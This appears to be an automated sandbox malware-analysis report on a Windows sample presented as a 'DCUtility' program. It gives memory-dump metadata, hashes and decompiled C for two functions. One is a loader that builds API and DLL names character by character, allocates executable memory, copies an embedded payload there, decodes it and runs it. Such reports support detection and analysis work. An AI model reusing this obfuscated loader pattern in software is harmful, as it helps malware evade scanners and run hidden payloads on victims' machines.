Result is:alpha=%f, xrefs: 00404244
Result is:alpha=%f, xrefs: 004054B9
Result is:alpha=%f, xrefs: 00404A78
Result is:alpha=%f, xrefs: 00404BB3
Result is:alpha=%f, xrefs: 00404BF9
Result is:alpha=%f, xrefs: 0040509F
Result is:alpha=%f, xrefs: 004053C4
Result is:alpha=%f, xrefs: 00405B6C
Result is:alpha=%f, xrefs: 00405243
Result is:alpha=%f, xrefs: 00404A0F
Result is:alpha=%f, xrefs: 00404BD6
Result is:alpha=%f, xrefs: 00404316
Result is:alpha=%f, xrefs: 0040572F
Result is:alpha=%f, xrefs: 0040558B
Result is:alpha=%f, xrefs: 004037BD
Result is:alpha=%f, xrefs: 00404E06
Result is:alpha=%f, xrefs: 00404FF0
Result is:alpha=%f, xrefs: 004038F8
Result is:alpha=%f, xrefs: 00403ABF
Result is:alpha=%f, xrefs: 00405171
Result is:alpha=%f, xrefs: 004050E5
Result is:alpha=%f, xrefs: 00404799
Result is:alpha=%f, xrefs: 00404E4C
Result is:alpha=%f, xrefs: 00403E07
Result is:alpha=%f, xrefs: 00403754
Result is:alpha=%f, xrefs: 00403AE2
Result is:alpha=%f, xrefs: 004051FD
Result is:alpha=%f, xrefs: 00403E70
Result is:alpha=%f, xrefs: 00405798
Result is:alpha=%f, xrefs: 0040537E
Result is:alpha=%f, xrefs: 00403849
Result is:alpha=%f, xrefs: 004050C2
Result is:alpha=%f, xrefs: 0040458C
Result is:alpha=%f, xrefs: 00404500
Result is:alpha=%f, xrefs: 004057DE
Result is:alpha=%f, xrefs: 00403BD7
Result is:alpha=%f, xrefs: 00404CA8
Result is:alpha=%f, xrefs: 00404DE3
Result is:alpha=%f, xrefs: 00404D9D
Result is:alpha=%f, xrefs: 00404FAA
Result is:alpha=%f, xrefs: 00405315
Result is:alpha=%f, xrefs: 004042D0
Result is:alpha=%f, xrefs: 00403EFC
Result is:alpha=%f, xrefs: 0040593C
Result is:alpha=%f, xrefs: 0040405A
Result is:alpha=%f, xrefs: 00403CEF
Result is:alpha=%f, xrefs: 00404037
Result is:alpha=%f, xrefs: 00404E6F
Result is:alpha=%f, xrefs: 00405801
Result is:alpha=%f, xrefs: 00404F41
Result is:alpha=%f, xrefs: 00405013
Result is:alpha=%f, xrefs: 00405522
Result is:alpha=%f, xrefs: 00403BFA
Result is:alpha=%f, xrefs: 00404C3F
Result is:alpha=%f, xrefs: 004045AF
Result is:alpha=%f, xrefs: 00404B6D
Result is:alpha=%f, xrefs: 00404EFB
Result is:alpha=%f, xrefs: 00405473
Result is:alpha=%f, xrefs: 00403826
Result is:alpha=%f, xrefs: 004040E6
Result is:alpha=%f, xrefs: 00404C62
Result is:alpha=%f, xrefs: 00404B4A
Result is:alpha=%f, xrefs: 00404474
Result is:alpha=%f, xrefs: 004052F2
Result is:alpha=%f, xrefs: 00405A54
Result is:alpha=%f, xrefs: 00405B8F
Result is:alpha=%f, xrefs: 00403D7B
Result is:alpha=%f, xrefs: 004052CF
Result is:alpha=%f, xrefs: 00404014
Result is:alpha=%f, xrefs: 00404848
Result is:alpha=%f, xrefs: 00404F1E
Result is:alpha=%f, xrefs: 00405545
Result is:alpha=%f, xrefs: 00404195
Result is:alpha=%f, xrefs: 004059C8
Result is:alpha=%f, xrefs: 00405C1B
Result is:alpha=%f, xrefs: 0040465E
Result is:alpha=%f, xrefs: 004047DF
Result is:alpha=%f, xrefs: 00404960
Result is:alpha=%f, xrefs: 004056A3
Result is:alpha=%f, xrefs: 00405BB2
Result is:alpha=%f, xrefs: 004052AC
Result is:alpha=%f, xrefs: 00405752
Result is:alpha=%f, xrefs: 00404753
Result is:alpha=%f, xrefs: 00404983
Result is:alpha=%f, xrefs: 00403F65
Result is:alpha=%f, xrefs: 004042F3
Result is:alpha=%f, xrefs: 004045F5
Result is:alpha=%f, xrefs: 00403D35
Result is:alpha=%f, xrefs: 00403A79
Result is:alpha=%f, xrefs: 00405059
Result is:alpha=%f, xrefs: 00404267
Result is:alpha=%f, xrefs: 00405108
Result is:alpha=%f, xrefs: 00404E29
Result is:alpha=%f, xrefs: 00403961
Result is:alpha=%f, xrefs: 00403CA9
Result is:alpha=%f, xrefs: 004042AD
Result is:alpha=%f, xrefs: 00405BD5
Result is:alpha=%f, xrefs: 0040512B
Result is:alpha=%f, xrefs: 00403EB6
Result is:alpha=%f, xrefs: 004049A6
Result is:alpha=%f, xrefs: 004045D2
Result is:alpha=%f, xrefs: 00405568
Result is:alpha=%f, xrefs: 00403DC1
Result is:alpha=%f, xrefs: 0040486B
Result is:alpha=%f, xrefs: 00404D11
Result is:alpha=%f, xrefs: 00405775
Result is:alpha=%f, xrefs: 00404AE1
Result is:alpha=%f, xrefs: 00403F1F
Result is:alpha=%f, xrefs: 0040535B
Result is:alpha=%f, xrefs: 00403ED9
Result is:alpha=%f, xrefs: 0040388F
Result is:alpha=%f, xrefs: 0040428A
Result is:alpha=%f, xrefs: 0040542D
Result is:alpha=%f, xrefs: 00403A9C
Result is:alpha=%f, xrefs: 00403E93
Result is:alpha=%f, xrefs: 0040414F
Result is:alpha=%f, xrefs: 004039ED
Result is:alpha=%f, xrefs: 0040386C
Result is:alpha=%f, xrefs: 004055D1
Result is:alpha=%f, xrefs: 00405982
Result is:alpha=%f, xrefs: 004040A0
Result is:alpha=%f, xrefs: 00404B90
Result is:alpha=%f, xrefs: 00405A31
Result is:alpha=%f, xrefs: 0040440B
Result is:alpha=%f, xrefs: 00404B04
Result is:alpha=%f, xrefs: 0040470D
Result is:alpha=%f, xrefs: 0040493D
Result is:alpha=%f, xrefs: 00404A9B
Result is:alpha=%f, xrefs: 00404D34
Result is:alpha=%f, xrefs: 00405338
Result is:alpha=%f, xrefs: 0040565D
Result is:alpha=%f, xrefs: 004046EA
Result is:alpha=%f, xrefs: 00404C85
Result is:alpha=%f, xrefs: 00404FCD
Result is:alpha=%f, xrefs: 004058F6
Result is:alpha=%f, xrefs: 004056E9
Result is:alpha=%f, xrefs: 00404C1C
Result is:alpha=%f, xrefs: 00404CCB
Result is:alpha=%f, xrefs: 00404E92
Result is:alpha=%f, xrefs: 00405B03
Result is:alpha=%f, xrefs: 00404681
Result is:alpha=%f, xrefs: 00403DE4
Result is:alpha=%f, xrefs: 0040437F
Result is:alpha=%f, xrefs: 00404546
Result is:alpha=%f, xrefs: 004038B2
Result is:alpha=%f, xrefs: 0040463B
Result is:alpha=%f, xrefs: 004037E0
Result is:alpha=%f, xrefs: 00403CCC
Result is:alpha=%f, xrefs: 004055F4
Result is:alpha=%f, xrefs: 00404497
Result is:alpha=%f, xrefs: 00403FCE
Result is:alpha=%f, xrefs: 00405194
Result is:alpha=%f, xrefs: 00403731
Result is:alpha=%f, xrefs: 004059A5
Result is:alpha=%f, xrefs: 00405617
Result is:alpha=%f, xrefs: 004044DD
Result is:alpha=%f, xrefs: 00404A55
Result is:alpha=%f, xrefs: 004054DC
Result is:alpha=%f, xrefs: 00405824
Result is:alpha=%f, xrefs: 00403803
Result is:alpha=%f, xrefs: 004055AE
Result is:alpha=%f, xrefs: 004051B7
Result is:alpha=%f, xrefs: 004048B1
Result is:alpha=%f, xrefs: 00405680
Result is:alpha=%f, xrefs: 004051DA
Result is:alpha=%f, xrefs: 004039A7
Result is:alpha=%f, xrefs: 00403A10
Result is:alpha=%f, xrefs: 004049C9
Result is:alpha=%f, xrefs: 004048D4
Result is:alpha=%f, xrefs: 00404ABE
Result is:alpha=%f, xrefs: 0040407D
Result is:alpha=%f, xrefs: 00405BF8
Result is:alpha=%f, xrefs: 00404569
Result is:alpha=%f, xrefs: 00404D7A
Result is:alpha=%f, xrefs: 004048F7
Result is:alpha=%f, xrefs: 00404618
Result is:alpha=%f, xrefs: 0040442E
Result is:alpha=%f, xrefs: 004049EC
Result is:alpha=%f, xrefs: 004058D3
Result is:alpha=%f, xrefs: 00403BB4
Result is:alpha=%f, xrefs: 00403D12
Result is:alpha=%f, xrefs: 00403B4B
Result is:alpha=%f, xrefs: 00404CEE
Result is:alpha=%f, xrefs: 00403984
Result is:alpha=%f, xrefs: 00403E4D
Result is:alpha=%f, xrefs: 00405496
Result is:alpha=%f, xrefs: 00405A9A
Result is:alpha=%f, xrefs: 00403F42
Result is:alpha=%f, xrefs: 00404109
Result is:alpha=%f, xrefs: 004044BA
Result is:alpha=%f, xrefs: 0040393E
Result is:alpha=%f, xrefs: 0040595F
Result is:alpha=%f, xrefs: 00404D57
Result is:alpha=%f, xrefs: 0040488E
Result is:alpha=%f, xrefs: 00403C86
Result is:alpha=%f, xrefs: 00404523
Result is:alpha=%f, xrefs: 00404F64
Result is:alpha=%f, xrefs: 0040588D
Result is:alpha=%f, xrefs: 00403777
Result is:alpha=%f, xrefs: 00403C40
Result is:alpha=%f, xrefs: 00403B6E
Result is:alpha=%f, xrefs: 00403F88
Result is:alpha=%f, xrefs: 00404730
Result is:alpha=%f, xrefs: 00404451
Result is:alpha=%f, xrefs: 004053E7
Result is:alpha=%f, xrefs: 004041FE
Result is:alpha=%f, xrefs: 004041DB
Result is:alpha=%f, xrefs: 004038D5
Result is:alpha=%f, xrefs: 0040391B
Result is:alpha=%f, xrefs: 00404F87
Result is:alpha=%f, xrefs: 00403C1D
Result is:alpha=%f, xrefs: 00404EB5
Result is:alpha=%f, xrefs: 0040570C
Result is:alpha=%f, xrefs: 00403D58
Result is:alpha=%f, xrefs: 00405036
Result is:alpha=%f, xrefs: 00403C63
Result is:alpha=%f, xrefs: 004057BB
Result is:alpha=%f, xrefs: 00405ABD
Result is:alpha=%f, xrefs: 00405B26
Result is:alpha=%f, xrefs: 0040491A
Result is:alpha=%f, xrefs: 00403A33
Result is:alpha=%f, xrefs: 00403E2A
Result is:alpha=%f, xrefs: 0040412C
Result is:alpha=%f, xrefs: 004046A4
Result is:alpha=%f, xrefs: 0040514E
Result is:alpha=%f, xrefs: 004053A1
Result is:alpha=%f, xrefs: 00405847
Result is:alpha=%f, xrefs: 00405289
Result is:alpha=%f, xrefs: 00404ED8
Result is:alpha=%f, xrefs: 004058B0
Result is:alpha=%f, xrefs: 004043C5
Result is:alpha=%f, xrefs: 0040507C
Result is:alpha=%f, xrefs: 0040540A
Result is:alpha=%f, xrefs: 004056C6
Result is:alpha=%f, xrefs: 004059EB
Result is:alpha=%f, xrefs: 00403D9E
Result is:alpha=%f, xrefs: 004043E8
Result is:alpha=%f, xrefs: 00404825
Result is:alpha=%f, xrefs: 00405A0E
Result is:alpha=%f, xrefs: 0040586A
Result is:alpha=%f, xrefs: 00404A32
Result is:alpha=%f, xrefs: 004043A2
Result is:alpha=%f, xrefs: 0040563A

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendShowWindowprintf
String ID: Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f
API String ID: 1907410214-1278610306
Opcode ID: ea3b6c904092c20826b704aec15b93ed294b4d25169652c282d9960c64a7dd26
Instruction ID: ac712959d4951086927383aa87c226e95276a086af3908d12ee858117dd3c5d8
Opcode Fuzzy Hash: ea3b6c904092c20826b704aec15b93ed294b4d25169652c282d9960c64a7dd26
Instruction Fuzzy Hash: D9238D6024392876D1393BA7AC8FDEF3E1CDF0B694F024559F1C8500918B69A266D6FF

Uniqueness

Uniqueness Score: -1.00%

Function 00407273, Relevance: 63.1, APIs: 10, Strings: 26, Instructions: 124
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00407273() {
				void* __ebx;
				void* __edi;
				struct HINSTANCE__* _t66;
				struct HINSTANCE__* _t69;
				void* _t73;
				void* _t77;
				void* _t92;
				intOrPtr* _t94;
				void* _t99;
				void* _t103;

				L004269E6();
				_t78 = 0;
				 *(_t103 - 0x3c) =  *((intOrPtr*)(_t103 + 0xf));
				__imp__?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z(0, _t92, _t99, _t77);
				asm("repne scasb");
				__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z("CZ5gi3jH",  !(_t103 - 0x0000003c | 0xffffffff) - 1);
				 *(_t103 - 4) = 0;
				 *(_t103 - 0x50) = 0x56;
				 *((char*)(_t103 - 0x4f)) = 0x69;
				 *((char*)(_t103 - 0x4e)) = 0x72;
				 *((char*)(_t103 - 0x4d)) = 0x74;
				 *((char*)(_t103 - 0x4c)) = 0x75;
				 *((char*)(_t103 - 0x4b)) = 0x61;
				 *((char*)(_t103 - 0x4a)) = 0x6c;
				 *((char*)(_t103 - 0x49)) = 0x41;
				 *((char*)(_t103 - 0x48)) = 0x6c;
				 *((char*)(_t103 - 0x47)) = 0x6c;
				 *((char*)(_t103 - 0x46)) = 0x6f;
				 *((char*)(_t103 - 0x45)) = 0x63;
				 *((char*)(_t103 - 0x44)) = 0x45;
				 *((char*)(_t103 - 0x43)) = 0x78;
				 *((char*)(_t103 - 0x42)) = 0x4e;
				 *((char*)(_t103 - 0x41)) = 0x75;
				 *((char*)(_t103 - 0x40)) = 0x6d;
				 *((char*)(_t103 - 0x3f)) = 0x61;
				 *((char*)(_t103 - 0x3e)) = 0;
				 *(_t103 - 0x2c) = 0x6b;
				 *((char*)(_t103 - 0x2b)) = 0x65;
				 *((char*)(_t103 - 0x2a)) = 0x72;
				 *((char*)(_t103 - 0x29)) = 0x6e;
				 *((char*)(_t103 - 0x28)) = 0x65;
				 *((char*)(_t103 - 0x27)) = 0x6c;
				 *((char*)(_t103 - 0x26)) = 0x33;
				 *((char*)(_t103 - 0x25)) = 0x32;
				 *((char*)(_t103 - 0x24)) = 0x2e;
				 *((char*)(_t103 - 0x23)) = 0x64;
				 *((char*)(_t103 - 0x22)) = 0x6c;
				 *((char*)(_t103 - 0x21)) = 0x6c;
				 *((char*)(_t103 - 0x20)) = 0;
				_t66 = LoadLibraryExA(_t103 - 0x2c, 0, 0);
				_t39 = _t103 - 0x50; // 0x56
				_t94 = GetProcAddress(_t66, _t39);
				 *(_t103 - 0x1c) = 0x74;
				 *((char*)(_t103 - 0x1b)) = 0x61;
				 *((char*)(_t103 - 0x1a)) = 0x73;
				 *((char*)(_t103 - 0x19)) = 0x6b;
				 *((char*)(_t103 - 0x18)) = 0x6d;
				 *((char*)(_t103 - 0x17)) = 0x67;
				 *((char*)(_t103 - 0x16)) = 0x72;
				 *((char*)(_t103 - 0x15)) = 0x2e;
				 *((char*)(_t103 - 0x14)) = 0x65;
				 *((char*)(_t103 - 0x13)) = 0x78;
				 *((char*)(_t103 - 0x12)) = 0x65;
				 *((char*)(_t103 - 0x11)) = 0;
				_t69 = LoadLibraryExA(_t103 - 0x1c, 0, 0); // executed
				if(_t69 != 0) {
					_t73 =  *_t94(GetCurrentProcess(), 0, 0x8944, 0x3000, atoi("64"), 0); // executed
					_t111 = _t73;
					 *(_t103 - 0x10) = _t73;
					if(_t73 != 0) {
						memcpy(_t73, 0x434640, 0x2251 << 2);
						E0040133E(0, 0, 0x438ae2, _t111);
						 *(_t103 - 0x10)( *((intOrPtr*)(_t103 + 8)),  *((intOrPtr*)(_t103 + 0xc)), _t73, 0x8944);
						_t78 = 1;
					}
				}
				 *(_t103 - 4) =  *(_t103 - 4) | 0xffffffff;
				__imp__?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z(1);
				 *[fs:0x0] =  *((intOrPtr*)(_t103 - 0xc));
				return _t78;
			}

APIs

_EH_prolog.MSVCRT ref: 00407278
?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 0040728F
?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(CZ5gi3jH), ref: 004072AB
LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 0040733E
GetProcAddress.KERNEL32(00000000,VirtualAllocExNuma), ref: 00407345
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00407382
atoi.MSVCRT ref: 0040738E
GetCurrentProcess.KERNEL32(00000000,00008944,00003000,00000000), ref: 004073A1
VirtualAllocExNuma.KERNELBASE(00000000), ref: 004073A8

Part of subcall function 0040133E: printf.MSVCRT ref: 00403736
Part of subcall function 0040133E: SendMessageA.USER32 ref: 00403743
Part of subcall function 0040133E: ShowWindow.USER32(00000000,00000000), ref: 00403747
Part of subcall function 0040133E: printf.MSVCRT ref: 00403759
Part of subcall function 0040133E: SendMessageA.USER32 ref: 00403766
Part of subcall function 0040133E: ShowWindow.USER32(00000000,00000000), ref: 0040376A

?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 004073E1

Strings

m, xrefs: 00407362
s, xrefs: 0040735A
k, xrefs: 0040730B
3, xrefs: 00407323
t, xrefs: 00407352
x, xrefs: 00407376
@FC, xrefs: 004073BF
g, xrefs: 00407366
r, xrefs: 0040736A
., xrefs: 0040732B
a, xrefs: 00407356
VirtualAllocExNuma, xrefs: 00407340, 00407343
e, xrefs: 0040731B
l, xrefs: 0040731F
CZ5gi3jH, xrefs: 00407295, 004072A7
k, xrefs: 0040735E
d, xrefs: 0040732F
., xrefs: 0040736E
e, xrefs: 0040737A
r, xrefs: 00407313
e, xrefs: 00407372
2, xrefs: 00407327
n, xrefs: 00407317
l, xrefs: 00407337
e, xrefs: 0040730F
l, xrefs: 00407333

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$LibraryLoadMessageSendShowTidy@?$basic_string@Windowprintf$?assign@?$basic_string@AddressAllocCurrentH_prologNumaProcProcessV12@Virtualatoi
String ID: .$.$2$3$@FC$CZ5gi3jH$VirtualAllocExNuma$a$d$e$e$e$e$g$k$k$l$l$l$m$n$r$r$s$t$x
API String ID: 3967106979-3019711425
Opcode ID: f60dc783b930c9bb235c60a8918a3b476600151f62c44917da8ffb659f6f1537
Instruction ID: 01d50d3e8fb89a197a1a7df806ce5d06981428d10d1e72dc83186b6f783ad0f7
Opcode Fuzzy Hash: f60dc783b930c9bb235c60a8918a3b476600151f62c44917da8ffb659f6f1537
Instruction Fuzzy Hash: 56514060D082C8DDEB1287E8D8487EEBFB55B26748F084099E4947B2D2C7FE0519C77A

Uniqueness

Uniqueness Score: -1.00%

Function 00401631, Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401631(void* __ecx, void* __eflags) {
				void* __esi;
				void* _t31;
				signed char _t32;
				signed char _t34;
				void* _t40;
				signed int _t44;
				void* _t72;

				L004269E6();
				_t40 = __ecx;
				_t44 = 9;
				memcpy(_t72 - 0x74, "iro0h3ZuIA#jQ!&7cHqAx#!%U4CKgejKgrzy", _t44 << 2);
				_push(0x25);
				_push(_t72 - 0x74);
				asm("movsb"); // executed
				L0040169F(); // executed
				_t31 = L00401B72(_t72 - 0x28);
				_push(0);
				 *(_t72 - 4) = 0;
				L00425E5C();
				if(_t31 != 0) {
					L00425E50();
					_push("DCUtility");
					L00425E4A();
					L00425E44();
					_t32 =  *(_t31 + 0xc);
					_push(0);
					_push("ShowSplash");
					_push("Options");
					 *(_t40 + 0xc4) = _t32;
					L00425E3E();
					__eflags = _t32;
					if(__eflags == 0) {
						_t32 = L00401F5A(0, _t72, __eflags, 0x8e, 0x8f, 0xbb8);
					}
					_push(0x6c);
					L00425E38();
					 *(_t72 - 0x10) = _t32;
					__eflags = _t32;
					 *(_t72 - 4) = 1;
					if(_t32 == 0) {
						_t32 = 0;
						__eflags = 0;
					} else {
						_push(0x42c530);
						_push(0x42d0a0);
						_push(0x42e8f0);
						_push(0x80);
						L00425E32();
					}
					 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
					_push(_t32);
					L00425E2C();
					L00425E26();
					_push(_t72 - 0x4c);
					 *(_t72 - 4) = 2;
					L00425E20();
					_t34 = _t72 - 0x4c;
					_push(_t34);
					L00425E1A();
					__eflags = _t34;
					if(_t34 != 0) {
						_push(5);
						L00425E14();
						UpdateWindow( *( *((intOrPtr*)(_t40 + 0x20)) + 0x20));
						E00401433(_t72 - 0x28);
						_push(1);
						_pop(0);
					}
					_t20 = _t72 - 4;
					 *_t20 =  *(_t72 - 4) & 0x00000000;
					__eflags =  *_t20;
					L00425E0E();
				} else {
					_push(0xffffffff);
					_push(0);
					_push(0x8064);
					L00425E56();
				}
				 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
				L00401744(_t72 - 0x28,  *(_t72 - 4));
				 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
				return 0;
			}

APIs

_EH_prolog.MSVCRT ref: 004073FD
#1247.MFC42(00000000), ref: 00407433
#1199.MFC42(00008064,00000000,000000FF,00000000), ref: 00407444
#2621.MFC42(00000000), ref: 00407450
#6117.MFC42(DCUtility,00000000), ref: 0040745C
#1168.MFC42(DCUtility,00000000), ref: 00407461
#3521.MFC42(Options,ShowSplash,00000000,DCUtility,00000000), ref: 0040747C
#823.MFC42(0000006C,Options,ShowSplash,00000000,DCUtility,00000000), ref: 0040749E
#520.MFC42(00000080,0042E8F0,0042D0A0,0042C530,Options,ShowSplash,00000000,DCUtility,00000000), ref: 004074C5
#986.MFC42(00000000,Options,ShowSplash,00000000,DCUtility,00000000), ref: 004074D5
#296.MFC42(00000000,Options,ShowSplash,00000000,DCUtility,00000000), ref: 004074DD
#5214.MFC42(?,00000000,Options,ShowSplash,00000000,DCUtility,00000000), ref: 004074EC
